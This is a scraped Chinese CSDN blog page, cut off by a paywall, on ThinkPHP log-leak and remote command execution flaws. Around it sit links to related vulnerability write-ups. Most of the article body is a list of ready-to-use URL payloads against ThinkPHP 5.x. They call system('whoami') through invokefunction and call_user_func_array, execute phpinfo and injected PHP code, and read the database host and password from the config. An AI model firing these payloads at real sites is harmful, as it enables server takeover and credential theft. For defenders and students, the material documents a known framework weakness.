thinkphp日志泄漏漏洞_thinkPHP命令执行漏洞

最新推荐文章于 2024-03-01 20:33:35 发布
最新推荐文章于 2024-03-01 20:33:35 发布
阅读量549 收藏
点赞数
文章标签: thinkphp日志泄漏漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39948210/article/details/111738216
版权
本文详细探讨了ThinkPHP中的日志泄漏漏洞及其可能导致的命令执行风险。通过不同方式,如反射、函数调用等,可以执行系统命令和PHP代码。此外,文章还列举了多种获取系统信息、写入shell的方法,并介绍了如何利用日志文件进行文件包含攻击,以执行恶意代码。
摘要由CSDN通过智能技术生成

thinkPHP中反斜杠的作用是类库\命名空间

命令执行的姿势

通过反射invokefunction调用call_user_func_array方法,call_user_func_array函数接受两个参数,第一个为函数名,第二个为函数参数数组,如下所示,通过call_user_func_array函数调用system执行whoami函数

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

执行php代码

?s=index/\think\Request/input&filter=phpinfo&data=1

获取当前数据库名称

?s=index/think\config/get&name=database.hostname

获取当前数据库密码

?s=index/think\config/get&name=database.password

执行php代码

?s=index/\think\view\driver\Php/display&content=<?php %20phpinfo();?>

执行php代码

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

执行php代码

?s=index/\think\app/invokefunction&fu

最低0.47元/天 解锁文章
weixin_39948210
关注
如何解决ThinkPHP 日志信息泄露漏洞
刘杨造梦的博客
08-12 223
由此可见,国外还是挺脏的。都2024年了,买源码别再买thinkPHP3.x和thinkPHP5.x框架的源码了,最近几个月已经碰到两三个这5.x的了,找我修复,有个冤大头买个源码花了一两万结果还是5.x框架的,新项目现在都用thinkPHP8.x了,再怎么不行,用thinkPHP6.x也可以的。我看了一下他们的网站后,好家伙,发现是thinkPHP而且是5.0.24,其实他这个就是thinkPHP日志信息泄露漏洞,我们修复一下就好了,完全不需要用到mysql触发器。
thinkPHP3.x日志泄露漏洞复现
千寻的博客
12-18 3182
漏洞名称 thinkPHP3.x日志泄露 漏洞描述 ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多网站都没有关 ThinkPHP默认安装后,也会在Runtime目录下生成日志 日志很容易被猜解到,而且日志里面有执行SQL语句的记录 影响版本 thinkPHP3.2 thinkPHP3. 漏洞分析 THINKPHP3.2 结构:Application\Runtime\Logs\Home\16_09_09.log THINKPHP3.1结构:Runti
thinkphp3 与thinkphp5 日志信息泄露检测脚本.zip
02-20
thinkphp3 与thinkphp5 日志信息泄露检测脚本,亲测有效可用,如有侵权,请联系CSDN管理员删除即可
xstream xml转对象_【缺陷周话】第 38期——不安全的反序列化:XStream
weixin_39625008的博客
12-11 528
聚焦源代码安全,网罗国内外最新资讯!*声明:《缺陷周话》栏目系列文章由奇安信代码卫士团队原创出品。未经许可,禁止转载。转载请注明“转自奇安信代码卫士 www.codesafe.cn”。代码审计是使用静态分析发现源代码中安全缺陷的方法,辅助开发或测试人员在软件上线前较为全面地了解安全问题,防患于未然,因此一直以来都是学术界和产业界研究的热点,并已成为安全开发生命周期SDL 和DevS...
thinkphp日志泄漏漏洞_记一次火绒帮助企业用户分析日志:仅一个月遭遇近万次漏洞攻击...
weixin_36087877的博客
01-02 692
企业网络环境错综复杂,包括终端管理混乱,对U盘、外设、共享文件夹等公用资源缺乏防护,员工安全意识良莠不齐等,都容易导致病毒能够轻易入侵终端和服务器。部分企业在安装安全软件发现并解决当前安全威胁后,未能引起重视,进行全面排查等措施,或导致后续依旧有被攻击的风险。实际上,当企业中安全软件成功拦截漏洞攻击、查杀出病毒时,也往往意味着企业内部存在安全隐患,或正在遭遇外部攻击。需要管理人员根据安全软件的查杀...
ThinkPHP 日志信息泄露——漏洞复现
热门推荐
W小哥
02-20 2万+
一、漏洞简介 1、ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多网站都没有关 2、ThinkPHP默认安装后,也会在Runtime目录下生成日志 THINKPHP3.2 结构:Application\Runtime\Logs\Home\16_09_09.log THINKPHP3.1结构:Runtime\Logs\Home\16_09_09.log 日志存储结构是 :项目名\Runtime\Logs\Home\年份_月份_日期.log 注意: 日志信息非常详细
thinkphp日志泄漏漏洞_THINKPHP5近期暴露的漏洞
weixin_39818691的博客
12-20 686
这个THINKPHP5的漏洞涉及好几个版本,我测试中5.0.21和5.0.22都有,据说是5.0 ~ 5.0.23之间的版本都存在,这个漏洞可以执行写文件的操作。当然了,赶紧升级框架到安全版本是比较好的方式,不过我这边测试了一下,发现确实可以通过url访问注入进行执行写文件操作,例如http://你的域名/public/index.php?s=/index/\think\app/invokefun...
thinkphp日志泄漏漏洞_ThinkPHP漏洞分析与利用
weixin_39575775的博客
12-20 2062
一、组件介绍1.1 基本信息ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,遵循Apache 2开源协议发布,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL...
thinkphp日志泄漏漏洞_ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法...
weixin_39999730的博客
12-20 1043
ThinkPHP 3.1.3及之前的版本存在一个SQL注入漏洞,漏洞存在于ThinkPHP/Lib/Core/Model.class.php 文件根据官方文档对"防止SQL注入"的方法解释(见http://doc.thinkphp.cn/manual/sql_injection.html)使用查询条件预处理可以防止SQL注入,没错,当使用如下代码时可以起到效果:$Model->where("...
thinkphp日志泄漏漏洞_Thinkphp5-x远程代码执行漏洞分析
weixin_39939668的博客
12-20 999
漏洞介绍Thinkphp5.x版本(5.0.20)中没有对路由中的控制器进行严格过滤,在存在admin、index模块、没有开启强制路由的条件下(默认不开启),导致可以注入恶意代码利用反射类调用命名空间其他任意内置类,完成远程代码执行。影响版本THINKPHP 5.0.5-5.0.22THINKPHP 5.1.0-5.1.30漏洞分析这里选择对5.0.20版本进行分析,关键函数开头/thinkph...
thinkphp5.1.39、tp5.1.39版本
06-01
此版本为tp5.1.39 是thinkphp5.1.39
ThinkPhp日志文件遍历工具.zip
06-22
漏洞利用,目录扫描。。
thinkphp日志泄漏漏洞_ThinkPHP框架任意代码执行漏洞的利用及其修复方法
weixin_39955154的博客
12-20 1668
ThinkPHP是国内著名的开源的PHP框架,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。早期的思想架构来源于Struts,后来经过不断改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结 构和MVC模式,融合了Struts的Action和Dao思想和JSP...
Goby 漏洞更新 |ThinkPHP Debug 模式日志信息泄露漏洞
m0_46699477的博客
04-21 1319
ThinkPHP 是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架。ThinkPHP Debug 模式存在日志信息泄露漏洞,在开启Debug的情况下会在Runtime目录下生成日志,攻击者通过构造特殊URL地址,读取日志敏感信息。
ThinkPHP漏洞详解(自学)
最新发布
m0_64481831的博客
03-01 2926
Thinkphp是一个快速、兼容而且简单的轻量级PHP开发框架。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。Thinkphp发展至今,主要有2.x、3.x、5.x、6.x系列,其中2.x和3.x系列官方已停止维护,5.x系列是目前使用最多的一个系列,而3.x系列比较多的老用户。
ThinkPHP 日志信息泄露漏洞复现
小小猪的博客
11-15 4895
ThinkPHP 日志信息泄露漏洞复现 漏洞简介 ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多网站都没有关 ThinkPHP默认安装后,也会在Runtime目录下生成日志 THINKPHP3.2 结构:Application\Runtime\Logs\Home\16_09_09.log THINKPHP3.1结构:Runtime\Logs\Home\16_09_09.log 日...
thinkphp日志泄漏漏洞_Thinkphp5 远程代码执行漏洞事件分析报告
weixin_39908263的博客
12-20 2240
作者:知道创宇404实验室时间:2018年12月19日0x00 背景2018年12月10日,ThinkPHP 官方发布《ThinkPHP 5.* 版本安全更新》,修复了一个远程代码执行漏洞。由于 ThinkPHP 框架对控制器名没有进行足够的检测,导致攻击者可能可以实现远程代码执行。知道创宇404实验室漏洞情报团队第一时间开始漏洞应急,复现了该漏洞,并进行深入分析。经过一系列测试和源码分析,最终确...
ThinkPHP V5.0.5漏洞_ThinkPHP漏洞分析与利用
weixin_39602280的博客
11-19 2554
一、组件介绍1.1 基本信息ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,遵循Apache 2开源协议发布,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL...
thinkphp2_rce_2漏洞
05-02
thinkphp2_rce_2是指ThinkPHP 2.1.0至2.1.2版本中存在的一种远程命令执行漏洞。攻击者可以通过精心构造的请求,将恶意代码注入到目标服务器上,并执行任意命令。这个漏洞的原因是由于ThinkPHP在处理控制器的参数时,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值